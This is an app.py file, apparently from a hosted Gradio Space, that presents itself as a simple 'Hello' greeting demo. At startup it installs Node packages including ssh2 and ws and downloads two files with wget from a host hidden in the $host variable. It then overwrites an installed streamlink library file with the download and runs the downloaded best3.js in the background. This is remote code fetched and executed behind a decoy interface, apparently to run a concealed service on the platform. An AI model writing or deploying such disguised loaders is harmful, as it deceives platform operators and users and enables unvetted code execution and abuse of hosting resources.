st2 / app.py
stream1000's picture
Update app.py
d06614b verified
import gradio as gr
import subprocess
import sys
import os
import signal
subprocess.run('apt-get install nodejs -y', shell=True)
subprocess.run('apt-get install npm -y', shell=True)
subprocess.run('apt-get install htop -y', shell=True)
subprocess.run('apt-get install nano -y', shell=True)
subprocess.run('npm install express', shell=True)
subprocess.run('npm install fluent-ffmpeg', shell=True)
subprocess.run('npm install express ws ssh2', shell=True)
subprocess.run('wget -O /home/user/app/http_session.py http://$host/hg2/http_session.py', shell=True)
subprocess.run('wget -O /home/user/app/best3.js http://$host/hg2/best3.js', shell=True)
subprocess.run('python3 -m pip install --upgrade git+https://github.com/WesleySouto/streamlink.git', shell=True)
subprocess.run('mv /home/user/app/http_session.py /usr/local/lib/python3.10/site-packages/streamlink/plugin/api/http_session.py', shell=True)
subprocess.run('nohup node /home/user/app/best3.js > sssh.out 2>&1 &', shell=True)
def greet(name):
return "Hello " + name + "!!"
demo = gr.Interface(fn=greet, inputs="text", outputs="text")
demo.launch()